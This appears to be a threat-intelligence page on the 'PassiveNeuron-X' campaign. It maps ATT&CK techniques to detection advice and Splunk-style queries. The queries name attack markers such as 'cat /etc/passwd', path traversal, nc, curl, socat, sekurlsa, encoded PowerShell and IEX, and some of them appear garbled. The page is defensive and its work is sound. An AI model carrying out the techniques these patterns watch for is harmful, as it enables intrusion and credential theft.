
PassiveNeuron-X
Indicators of Compromise
No domains found for this campaign
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
REMEDIATION
T1190 - Exploit Public-Facing Application
ID | Data Source | Data Component | Detects |
Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Web Application Firewalls may detect improper inputs attempting exploitation. Web server logs (e.g., var/log/httpd or /var/log/apache for Apache web servers on Linux) may also record evidence of exploitation. (source="C:\inetpub\logs\LogFiles\W3SVC*" OR source="/var/log/apache2/access.log" OR source="/var/log/nginx/access.log")| eval exploit_attempt=if(like(cs_uri_query, "%exec%") OR like(cs_uri_query, "%cmd%") OR like(cs_uri_query, "%cat /etc/passwd%") OR like(cs_uri_query, "%../../%"), 1, 0)| stats count by src_ip, cs_uri_query, sc_status| where exploit_attempt=1 AND count > 5| table _time, src_ip, cs_uri_query, sc_status, count | |||
Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection strings or known payloads. For example, monitor for successively chained functions that adversaries commonly abuse (i.e. gadget chaining) through unsafe deserialization to exploit publicly facing applications for initial access.[114] In AWS environments, monitor VPC flow logs and/or Elastic Load Balancer (ELB) logs going to and from instances hosting externally accessible applications. (source="/var/log/zeek/http.log" OR source="C:\Windows\System32\LogFiles\Firewall")| regex http_request="(?i)select.from|union.select|cmd=.|exec=."| stats count by src_ip, dest_ip, http_method, uri_path| where count > 10| table _time, src_ip, dest_ip, http_method, uri_path, count |
T1071 - Application Layer Protocol
ID | Data Source | Data Component | Detects |
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). | |||
Monitor and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). |
T1055 - Process Injection
ID | Data Source | Data Component | Detects |
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc. | |||
Monitor for changes made to files that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. | |||
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. | |||
Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.[95] Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.[96] [97] [98] [99] | |||
Monitor for processes being viewed that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. | |||
Monitor for process memory inconsistencies, such as checking memory ranges against a known copy of the legitimate module.[100] | |||
Monitor for changes made to processes that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. |
T1021 - Remote Services
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. Analytic 1 - Detect adversary commands executed via remote sessions. index=* (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" OR sourcetype="/var/log/auth.log") AND (EventCode= 1 OR EventCode=sshd)| search parent_process_name="sshd" OR parent_process_name="mstsc.exe" OR parent_process_name="rdpclip.exe"| eval suspicious_command=case( match(command_line, "net user|powershell|/etc/passwd|nc|curl|socat"), "high", match(command_line, "whoami|ls|dir|pwd"), "low", true(), "normal" )| stats count by host, process_name, command_line, suspicious_command, _time| where count > threshold AND suspicious_command="high"| table _time, host, process_name, command_line, suspicious_command | |||
Monitor for user accounts logged into systems they would not normally access or abnormal access patterns, such as multiple systems over a relatively short period of time. Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. For example, in macOS you can review logs for "screensharingd" and "Authentication" event messages. [7][18] Note: When using Security event id 4624, %$ means user names that do not end with $ character. Usually, computer accounts or local system accounts names end with the $ character. When using Security event 4624, UserName and UserLogonId correspond to TargetUserName and TargetLogonId respectively. When using Security event 4624, LogonType 3 corresponds to a Network Logon Analytic 1 - New services being created under network logon sessions by non-system users(sourcetype="WinEventLog:Security" EventCode IN (4624, 4648, 4625)) AND LogonType="3" AND UserName NOT '$' | rename UserLogonId AS LogonID| join type=inner LogonID[| search (source="WinEventLog:Security" EventCode="4697") | rename UserLogonId as LogonID] | |||
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes, that may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. Note: On Windows, Sysmon Event ID 7 (Image loaded) can be used to monitor the loading of DLLs into processes, including those designed to accept remote connections. This is a particularly noisy event and can generate a large volume of data, so we recommend baselining and filtering out any known benign processes and module to help reduce the number of events that are produced. | |||
Monitor interactions with network shares, such as reads or file transfers, using remote services such as Server Message Block (SMB). | |||
Monitor for newly constructed network connections that may use Valid Accounts to log into a service specifically designed to accept remote connections, such as RDP, telnet, SSH, and VNC. Monitor network connections involving common remote management protocols, such as ports tcp:3283 and tcp:5900, as well as ports tcp: 3389 and tcp:22 for remote login. index="network_logs" sourcetype="network_connection"| search protocol IN ("tcp/22", "tcp/3389", "tcp/5900")| stats count by src_ip, dest_ip, dest_port, _time| eval suspicious_connection=if(src_ip NOT IN ("trusted_sources") AND count > threshold, "high", "normal")| where suspicious_connection="high"| table _time, src_ip, dest_ip, dest_port, suspicious_connection | |||
Monitor network data for uncommon data flows that may be related to abuse of Valid Accounts to log into a service specifically designed to accept remote connections, such as RDP, telnet, SSH, and VNC. Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on network service protocols such as SSH and RDP. Analytic 1 - Suspicious Protocols sourcetype="netflow" | search dest_port=22 OR dest_port=3389 OR dest_port=5900 OR dest_port=3283 // SSH, RDP, VNC, ARD | |||
Monitor for newly executed processes that may use Valid Accounts to log into a service specifically designed to accept remote connections, such as RDP, telnet, SSH, and VNC. The adversary may then perform actions that spawn additional processes as the logged-on user. Malicious actors may rename built-in commands or external tools, such as those provided by SysInternals, to better blend in with the environment. In those cases, the file path name is arbitrary and may blend in well with the background. If the arguments are closely inspected, it may be possible to infer what tools are running and understand what an adversary is doing. When any legitimate software shares the same command lines, it must be whitelisted according to the expected parameters. Any tool of interest with commonly known command line usage can be detecting by command line analysis. Known substrings of command lines include
Analytic 1 - Suspicious Arguments (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") AND CommandLine="-R . -pw" OR CommandLine="-pw . . .@." OR CommandLine="sekurlsa" OR CommandLine=" -hp " OR CommandLine=". a .*" | |||
Monitor for newly constructed WMI objects that is often used to log into a service that accepts remote connects. |
T1090 - Proxy
ID | Data Source | Data Component | Detects |
Monitor for newly constructed network connections that are sent or received by untrusted hosts. | |||
Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). | |||
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. |
T1083 - File and Directory Discovery
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users. On ESXi servers, monitor for commands that leverage tools like grep and find to search for files with VM extensions such as vmdk, or in VM-related paths such as /vmfs/*.[401][402][403] | |||
Monitor for API calls that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. | |||
Monitor newly executed processes that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. |
T1057 - Process Discovery
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments for actions that may attempt to get information about running processes on a system. | |||
Monitor for API calls may attempt to get information about running processes on a system. | |||
Monitor for newly executed processes that may attempt to get information about running processes on a system. To be effective in deciphering malicious and benign activity, the full command line is essential. Similarly, having information about the parent process can help with making decisions and tuning to an environment. Because these commands are built in, they may be run frequently by power users or even by normal users. Thus, an analytic looking at this information should have well-defined white- or blacklists, and should consider looking at an anomaly detection approach, so that this information can be learned dynamically.Within the built-in Windows Commands:
Analytic 1 - Host Discovery Commands (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") (Image="C:\Windows\\hostname.exe" OR Image="C:\Windows\\ipconfig.exe" OR Image="C:\Windows\\net.exe" OR Image="C:\Windows\\quser.exe" OR Image="C:\Windows\\qwinsta.exe" OR (Image="C:\Windows\\sc.exe" AND (CommandLine=" query " OR CommandLine=" qc ")) OR Image="C:\Windows\\systeminfo.exe" OR Image="C:\Windows\\tasklist.exe" OR Image="C:\Windows\*\whoami.exe")|stats values(Image) as "Images" values(CommandLine) as "Command Lines" by ComputerName |
T1059.001 - PowerShell
ID | Data Source | Data Component | Detects |
If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). [321] PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.[322] An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data. PowerShell can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe For this to work, certain registry keys must be set, and the WinRM service must be enabled. The PowerShell command Enter-PSSession -ComputerName \<RemoteHost> creates a remote PowerShell session. Analytic 1 - Look for unusual PowerShell execution. sourcetype=WinEventLog:Microsoft-Windows-PowerShell/Operational| search EventCode=4104| eval suspicious_cmds=if(like(Message, "%-EncodedCommand%") OR like(Message, "%Invoke-Expression%") OR like(Message, "%IEX%") OR like(Message, "%DownloadFile%"), "Yes", "No")| where suspicious_cmds="Yes" | |||
Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).[3][4] Analytic 1 - Processes loading PowerShell assemblies sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational| search EventCode=7 ImageLoaded IN ("C:\Windows\System32\System.Management.Automation.dll", "C:\Windows\System32\powershell.exe") | |||
Monitor for newly executed processes that may abuse PowerShell commands and scripts for execution. PowerShell is a scripting environment included with Windows that is used by both attackers and administrators. Execution of PowerShell scripts in most Windows versions is opaque and not typically secured by antivirus which makes using PowerShell an easy way to circumvent security measures. This analytic detects execution of PowerShell scripts. Powershell can be used to hide monitored command line execution such as: net usesc start Note: - The logic for Analytic 1 is based around detecting on non-interactive Powershell sessions (i.e., those not launched by a user through explorer.exe). This may lead to false positives when used in a production environment, so we recommend tuning any such analytics by including additional logic (e.g., looking for suspicious parent processes) that helps filter such events.- The logic for Analytic 2 is based around detecting on remote Powershell sessions. PowerShell can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe. Analytic 1 - Non-interactive Powershell Sessions (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="powershell.exe" AND ParentImage!="explorer.exe" Analytic 2 - Remote Powershell Sessions (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="wsmprovhost.exe" AND ParentImage="svchost.exe" Analytic 3 - Powershell Execution (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") Image="C:\Windows\\powershell.exe" ParentImage!="C:\Windows\explorer.exe"|stats values(CommandLine) as "Command Lines" values(ParentImage) as "Parent Images" by ComputerName | |||
Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential Downgrade Attack) as well as if PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.[323] | |||
Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Analytic 1 - Script Block Logging Events (source=WinEventLog:"Microsoft-Windows-PowerShell/Operational" EventID="4104" AND Image="powershell.exe" AND (CommandLine="-enc" OR CommandLine="-ep bypass" OR CommandLine="-noni*") |
T1547.001 - Registry Run Keys / Startup Folder
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. | |||
Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including the startup folders. [313] | |||
Monitor for newly executed processes executed from the Run/RunOnce registry keys through Windows EID 9707 or "Software\Microsoft\Windows\CurrentVersion\Run" and "Software\Microsoft\Windows\CurrentVersion\RunOnce" registry keys with the full command line. Registry modifications are often essential in establishing persistence via known Windows mechanisms. Many legitimate modifications are done graphically via regedit.exe or by using the corresponding channels, or even calling the Registry APIs directly. The built-in utility reg.exe provides a command-line interface to the registry, so that queries and modifications can be performed from a shell, such as cmd.exe. When a user is responsible for these actions, the parent of cmd.exe will likely be explorer.exe. Occasionally, power users and administrators write scripts that do this behavior as well, but likely from a different process tree. These background scripts must be learned so they can be tuned out accordingly. Output DescriptionThe sequence of processes that resulted in reg.exe being started from a shell. That is, a hierarchy that looks like• great-grand_parent.exe• grand_parent.exe• parent.exe• reg.exe Analytic 1 - Reg.exe called from Command Shell (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="reg.exe" AND ParentImage="cmd.exe"| join left=L right=R where L.ParentProcessGuid = R.ProcessGuid [search EventCode IN (1, 4688) Image="cmd.exe" ParentImage!="explorer.exe"] | |||
Monitor for newly created windows registry keys that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. | |||
Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations. [313] Detection of the modification of the registry key Common Startup located in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\ and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders. When a user logs on, any files located in the Startup Folder are launched. Attackers may modify these folders with other files in order to evade detection set on these default folders. This detection focuses on EventIDs 4688 and 1 for process creation and EventID 4657 for the modification of the Registry Keys. Analytic 1 - Modification of Default Startup Folder in the Registry Key ‘Common Startup’ (source="WinEventLog:Security" EventCode="4657" ObjectValueName="Common Startup") OR (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="13" TargetObject="*Common Startup") |
T1027 - Obfuscated Files or Information
ID | Data Source | Data Component | Detects |
The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network. | |||
Monitor executed commands and arguments for indicators of obfuscation and potentially suspicious syntax such as uninterpreted escape characters (e.g., ^). Also monitor command-lines for syntax-specific signs of obfuscation, such as variations of arguments associated with encoding. | |||
Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). | |||
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc. File-based signatures may be capable of detecting code obfuscation depending on the methods used.[185][186][187] | |||
Monitoring module loads, especially those not explicitly included in import tables, may highlight obfuscated code functionality. Dynamic malware analysis may also expose signs of code obfuscation.[186] | |||
Monitor and analyze calls to functions such as GetProcAddress() that are associated with malicious code obfuscation.[185] | |||
Monitor for newly executed processes that may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. | |||
Monitor executed scripts for indicators of obfuscation and potentially suspicious command syntax, such as uninterpreted escape characters (e.g., ^). Also monitor commands within scripts for syntax-specific signs of obfuscation, such as encoded or otherwise unreadable blobs of characters. | |||
Monitor for the creation of Registry values that may highlight storage of malicious data such as commands or payloads. | |||
Monitor for the creation of WMI Objects and values that may highlight storage of malicious data such as commands or payloads. |
T1573 - Encrypted Channel
ID | Data Source | Data Component | Detects |
Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). |
T1132 - Data Encoding
ID | Data Source | Data Component | Detects |
Monitor for network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on network protocols and packet contents. |
T1059.003 - Windows Command Shell
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may abuse the Windows command shell for execution. Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Analytic 1 - Look for unusual command shell execution. sourcetype=WinEventLog:Security| search (EventCode=4688 OR EventCode=4689) process_name="cmd.exe"| eval suspicious_cmd=if(like(command_line, "%/c%") OR like(command_line, "%.bat%") OR like(command_line, "%.cmd%"), "Yes", "No")| where suspicious_cmd="Yes" | |||
Monitor for newly executed processes that may abuse the Windows command shell for execution. Note: Try an Analytic by creating a baseline of parent processes of cmd seen over the last 30 days and a list of parent processes of cmd seen today. Parent processes in the baseline are removed from the set of parent processes seen today, leaving a list of new parent processes. This analytic attempts to identify suspicious programs spawning cmd by looking for programs that do not normally create cmd. It is very common for some programs to spawn cmd as a subprocess, for example to run batch files or Windows commands. However, many processes don’t routinely launch a command prompt - e.g., Microsoft Outlook. A command prompt being launched from a process that normally doesn’t launch command prompts could be the result of malicious code being injected into that process, or of an attacker replacing a legitimate program with a malicious one. Analytic 1 - Unusual Command Execution (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") AND CommandLine="cmd.exe" AND (CommandLine REGEXP "./c." OR CommandLine REGEXP ".._ \/k.*") |
T1105 - Ingress Tool Transfer
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments for suspicious activity associated with downloading external content. | |||
Monitor for file creation and files transferred into the network. | |||
Monitor for newly constructed network connections that are sent or received by untrusted hosts or creating files on-system may be suspicious. Abnormal use of utilities such as FTP may also be suspicious. | |||
Monitor network traffic content for files and other potentially malicious content, especially data coming in from abnormal/unknown domain and IPs. | |||
Monitor network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. |